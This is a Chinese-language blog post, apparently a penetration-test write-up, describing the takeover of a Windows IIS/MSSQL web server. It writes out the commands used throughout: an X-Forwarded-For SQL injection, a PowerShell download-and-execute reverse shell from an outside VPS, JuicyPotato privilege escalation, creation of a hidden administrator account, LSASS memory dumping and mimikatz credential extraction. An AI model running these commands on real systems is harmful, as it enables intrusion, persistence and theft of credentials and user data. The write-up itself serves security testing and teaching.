<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="授权测试拿下服务器"><meta name="keywords" content="web渗透"><meta name="author" content="gshell"><meta name="copyright" content="gshell"><title>授权测试拿下服务器 | gshell's blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.4.0'
} </script><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="gshell's blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="toc-number">1.</span> <span class="toc-text">授权测试拿下服务器</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/bamao.jpg"></div><div class="author-info__name text-center">gshell</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">13</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">6</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">5</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">安全论坛</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.t00ls.net/">tools</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://forum.90sec.com/">90sec</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.freebuf.com/">freebuf</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.sec-in.com/">SecIN</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://bbs.pediy.com/">看雪</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://xz.aliyun.com/">先知</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.anquanke.com/">安全客</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://paper.seebug.org/">seebug</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://www.52bug.cn">吾爱漏洞</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.0-sec.org/">零组文库</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.secpulse.com/">安全脉搏</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.shentoushi.top">渗透师</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://wiki.bylibrary.cn">白阁文库</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://wooyun.laolisafe.com/">乌云漏洞库</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.butian.net/">补天</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.vulbox.com/">漏洞盒子</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.bugbank.cn/">漏洞银行</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/blog-bg.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">gshell's blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">首页</a><a class="site-page" href="/archives">安全文章</a><a class="site-page" href="/tags">渗透测试</a><a class="site-page" href="/categories">安全研究</a><a class="site-page" href="/about">关于</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">授权测试拿下服务器</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-07-10</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E5%AE%9E%E6%88%98%E6%B8%97%E9%80%8F/">实战渗透</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h5 id="授权测试拿下服务器"><a href="#授权测试拿下服务器" class="headerlink" title="授权测试拿下服务器"></a>授权测试拿下服务器</h5><span id="more"></span>

<p>目标地址：<a target="_blank" rel="noopener" href="http://www.xxx.com/">http://www.xxx.com</a></p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/1.png"></p>
<p>找到ip地址，进行访问，发现ip为：x.x.x.x</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/2.png"></p>
<p>使用ip地址进行访问</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/3.png"></p>
<p><strong>0x01 信息收集</strong></p>
<p>指纹识别结果：IIS10.0，asp.net，Windows Server</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/4.png"></p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/5.png"></p>
<p>爬取了一下网站，发现fackeditor，和很多接口</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/6.png"></p>
<p>利用御剑目录扫描，扫出来一些fackeditor的连接和upload目录</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/7.png"></p>
<p><strong>0x02 测试阶段</strong></p>
<p>尝试利用fackeditor的两处上传点进行上传，但是由于一直卡住传不上去和白名单校验遂放弃了</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/8.png"></p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/9.png"></p>
<p>对主站抓包测试发现，网站回返回访问者IP地址，依据经验这里经常存在XFF注入</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/10.png"></p>
<p>截取数据包修改X-Forwarded-For： 1.1.1.1</p>
<p>发现当前ip并未变化说明此处不存在XSS，</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/11.png"></p>
<p>习惯性的试了个单引号，数据库报错了，可能存在sql注入，并且泄露了绝对路径。</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/12.png"></p>
<p>构造sqlserver注入语句：</p>
<p>‘ and 1=db_name()–    返回数据库</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/13.png"></p>
<p><strong>0x03 漏洞利用</strong></p>
<p>既然手工这样都可以注入出来，那尝试一下使用sqlmap。</p>
<p>X-Forwarded-For存在报错，堆叠以及延时注入</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/14.png"></p>
<p>尝试–os-shell,发现可以得到os-shell</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/15.png"></p>
<p>尝试执行whomai，mssqlserver权限</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/16.png"></p>
<p>当前权限不够，我们可以利用powershell来反弹shell，然后下载提权exp进行提权，然后添加用户来登陆目标服务器。</p>
<p>powershell IEX (New-Object Net.WebClient).DownloadString(‘<a target="_blank" rel="noopener" href="http://www.vps.com:8000/1.ps1&#39;);Invoke-lltestTcp">http://www.vps.com:8000/1.ps1&#39;);Invoke-lltestTcp</a></p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/17.png"></p>
<p>shell弹回来了</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/18.png"></p>
<p>版本是2016</p>
<p>现在尝试提权，利用烂土豆直接提，windows下载文件的方式有很多，这里选择powershell的下载方式：</p>
<p>将烂土豆放在vps的web目录</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/19.png"></p>
<p>在弹回来的powershell中习惯性进入c:\windows\tasks目录，dir发现无文件，然后</p>
<p>输入</p>
<p>$client=new-object System.Net.WebClient</p>
<p>再输入：</p>
<p>$client.DownloadFile(‘<a target="_blank" rel="noopener" href="http://www.vps.com:8000/p1.exe&#39;">http://www.vps.com:8000/p1.exe&#39;</a>, ‘c:\windows\tasks\p1.exe’)</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/20.png"></p>
<p>成功下载提权exp到目录，利用exp提权到system权限</p>
<p>JuicyPotato</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/21.png"></p>
<p>接下来新建用户，添加到管理员组</p>
<p>./p1.exe -p “net user admin password /add”</p>
<p>./p1.exe -p “net localgroup administrators admin /add”</p>
<p>./p1.exe -p “net user admin”发现用户添加到管理员组成功。</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/22.png"></p>
<p>接下来找rdp端口，判断是否开放或者对外开放。</p>
<p>tasklist /svc |findstr “Ter”</p>
<p>查找TermService对应的pid</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/23.png"></p>
<p>通过pid来查找rdp端口，端口为11520</p>
<p>netstat -ano | findstr “1628”</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/24.png"></p>
<p>通过nmap扫描IP地址发现11520端口对外开放，都不用做流量代理了，很舒服。</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/25.png"></p>
<p>现在我们通过新建在管理员组的用户登陆进去</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/26.png"></p>
<p>桌面上东西有点少，在这台电脑里面翻东西有点废时间，于是传了个everything上去</p>
<p>因为不是administrator，弹出来了uac，强迫症的我还是想dump出这个管理员的密码。</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/27.png"></p>
<p>因为现在已经进了3389了，就直接在目标服务器上传mimikatz，省的去webshell里面执行了。</p>
<p>传上去一运行就被杀了，土豆没杀却杀了mimiakatz，利用过了360和火绒的免杀mimikatz依然被杀。</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/28.png"></p>
<p>对比tasklist /svc发现是微软自带的Microsoft Security Essentials</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/29.png"></p>
<p>看来直接运行mimikatz是不行了，那就尝试导出lsass.dmp吧，导出lsass.dmp有很多种方法，免杀的有sqldumper和procdump，还可以利用powershell。</p>
<p>这里利用procdump导出了</p>
<p>procdump64.exe -accepteula -ma lsass.exe c:\lsass.dmp</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/30.png"></p>
<p>但是很神奇，过了一会当我准备拷贝lsass.dmp到本地的时候发现，lsass.dmp居然没了，纳尼？</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/31.png"></p>
<p>不过不碍事，只要我手速够快，就没有问题，纳尼？手速够快，拷贝速度不够啊，还没拷过来一丢丢呢，就直接出现了错误，果然lsass.dmp果然又没了。</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/32.png"></p>
<p>那怎么办，dump到其他盘符试试，还是没了</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/33.png"></p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/34.png"></p>
<p>那咱们利用sqldumper</p>
<p>通过everything搜索sqldumper，sqldumper的常见路径如下：</p>
<p>C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe</p>
<p>C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\SQLDumper.exe</p>
<p>C:\Program Files (x86)\Microsoft SQL Server\100\Shared\SqlDumper.exe</p>
<p>发现这个机器的sqldumper的路径和平时遇见的不太一致，先试试吧</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/35.png"></p>
<p>利用lsass.exe发现PID</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/36.png"></p>
<p>利用sqldumper失败了</p>
<p>“C:\Program Files (x86)\Microsoft SQL Server\130\Shared\SqlDumper.exe” 1316 0 0x01100</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/37.png"></p>
<p>换一个路径，dump下来了SQLDmpr0001.mdmp</p>
<p>“C:\Program Files\Microsoft SQL Server\130\Shared\SqlDumper.exe” 1316 0 0x01100</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/38.png"></p>
<p>管理员打开mimikatz，抱错了，有点小难受，具体原因还不清楚。</p>
<p>sekurlsa::minidump SQLDmpr0001.mdmp”</p>
<p>sekurlsa::logonPasswords full</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/39.png"></p>
<p>那最后试试powershell吧</p>
<p>powershell -c “rundll32 C:\windows\system32\comsvcs.dll, MiniDump 1316 C:\lsass.dmp full” </p>
<p>成功dump</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/40.png"></p>
<p>刷新了半天发现lsass.dmp还在，赶紧拷贝到本地利用mimikatz解密，ok感谢电脑，拷贝过来了</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/41.png"></p>
<p>mimikatz解密一下</p>
<p>sekurlsa::minidump lsass.dmp</p>
<p>sekurlsa::logonPasswords full</p>
<p>Password那里是空的，在win10或者2012R2以上，默认在缓存中禁止保存明文密码，可以修改注册表并且管理员需要重新登陆才能成功抓取明文，不过可以解密一下NTLM</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/42.png"></p>
<p>nice，果然是收费的，</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/43.png"></p>
<p>找小姐姐花了一块钱成功解密，感谢小姐姐，如果每一个做安全的都像我一样抠门，这些网站估计要倒闭吧</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/44.png"></p>
<p>我们利用administrator登陆一下</p>
<p>舒服了，桌面上多了很多东西，慢慢翻吧，</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/45.png"></p>
<p>打开sqlserver management，windows身份认证直接登陆上去：</p>
<p>账号密码邮箱手机号找到了，再继续多翻点配置文件啥的写报告就不多赘述了。</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/46.png"></p>
<p>不过这个站没有内网，后来也就没有进行下去了。因为是授权的，痕迹也不用清了，接下来就是交报告了。</p>
<p><img src="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/47.png"></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">gshell</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://www.gsheller.top/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/">http://www.gsheller.top/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://www.gsheller.top">gshell's blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web%E6%B8%97%E9%80%8F/">web渗透</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"><i class="fa fa-chevron-left">  </i><span>深信服EDR代码审计</span></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(/blog-bg.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2018 - 2021 By gshell</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">低调行进，潜习安全</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>